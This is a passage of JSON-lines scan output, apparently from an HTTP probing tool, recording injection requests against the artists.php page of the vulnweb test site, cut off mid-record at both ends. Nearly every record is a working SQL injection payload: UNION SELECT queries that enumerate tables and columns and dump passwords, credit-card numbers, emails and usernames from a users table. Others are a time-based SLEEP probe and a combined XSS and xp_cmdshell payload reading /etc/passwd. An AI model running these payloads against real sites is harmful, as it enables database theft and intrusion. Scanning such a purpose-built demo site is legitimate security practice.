:23:00.221919597Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist\\u0026oqXf=8943%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=\\u0026oqXf=8943%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist\\u0026oqXf=8943%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"344.28124ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:00.414118883Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=)\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=)\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=)\",\"time\":\"358.829265ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:03.671067181Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1\",\"time\":\"361.970958ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:03.766366625Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20UNION%20SELECT%201,version(\",\"time\":\"342.066309ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:03.862915862Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()\",\"time\":\"350.459824ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5034,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:03.930386458Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20database%20(),%203\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20database%20(),%203\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20database%20(),%203\",\"time\":\"354.122053ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5002,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:04.264298158Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20group_concat%20(pass),%203%20from%20users\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20group_concat%20(pass),%203%20from%20users\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20group_concat%20(pass),%203%20from%20users\",\"time\":\"348.977543ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:04.632337189Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20group_concat%20(table_name),%203%20de%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20group_concat%20(table_name),%203%20de%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20group_concat%20(table_name),%203%20de%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()\",\"time\":\"347.431766ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:04.645856627Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%200,1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%200,1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%200,1\",\"time\":\"353.345991ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:04.892356739Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%201,1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%201,1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%201,1\",\"time\":\"349.326877ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5001,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:05.406231441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%202,1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%202,1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%202,1\",\"time\":\"364.782148ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5001,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:05.5385224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%203,1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%203,1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%203,1\",\"time\":\"353.377941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5004,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:07.241155142Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%20artist=1-SLEEP(3)\",\"input\":\"http://testphp.vulnweb.com/artists.php?%20artist=1-SLEEP(3)\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%20artist=1-SLEEP(3)\",\"time\":\"9.348458527s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:08.61302378Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20version%20(),%20current_user%20()\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20version%20(),%20current_user%20()\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,%20version%20(),%20current_user%20()\",\"time\":\"347.382306ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5034,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:08.908746077Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,2,3\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,2,3\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,2,3\",\"time\":\"355.201938ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":4997,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:09.642807885Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,2,group_concat(pass)%20from%20users--\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,2,group_concat(pass)%20from%20users--\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,2,group_concat(pass)%20from%20users--\",\"time\":\"344.010289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5000,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:09.679542454Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(cc),3%20from%20users\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(cc),3%20from%20users\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,group_concat(cc),3%20from%20users\",\"time\":\"354.898195ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5015,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:09.68081603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name='users'\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name='users'\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name='users'\",\"time\":\"348.750574ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5039,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:09.757301158Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(email),3%20from%20users\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(email),3%20from%20users\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,group_concat(email),3%20from%20users\",\"time\":\"355.272646ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5024,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:09.768565151Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(uname),3%20from%20users\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(uname),3%20from%20users\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-1%20union%20select%201,group_concat(uname),3%20from%20users\",\"time\":\"358.057119ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":5000,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:09.831644358Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=-2\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=-2\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=-2\",\"time\":\"343.274744ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.018091118Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=0\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=0\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=0\",\"time\":\"356.170884ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.133919896Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1\",\"time\":\"359.677326ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.193676793Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20AND%201=0\",\"time\":\"356.093393ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.200222455Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20AND%201=1\",\"time\":\"350.388421ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.242443149Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20OR%2017-\",\"time\":\"362.971714ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.325623834Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20OR%2017-7%3d10\",\"time\":\"354.233334ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.479787289Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10CONFIRMED\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20OR%2017-7%3d10CONFIRMED\",\"time\":\"349.202059ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.562634519Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20or%201'\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20or%201'\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20or%201'\",\"time\":\"355.782099ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.56271238Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%201\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%201\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20order%20by%201\",\"time\":\"344.971069ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.609171376Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%202\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%202\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20order%20by%202\",\"time\":\"355.957908ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:10.818670982Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%204\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%204\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20order%20by%204\",\"time\":\"351.989768ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:14.044000957Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%20union%20select%201,2,3\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%20union%20select%201,2,3\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%20union%20select%201,2,3\",\"time\":\"345.788834ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"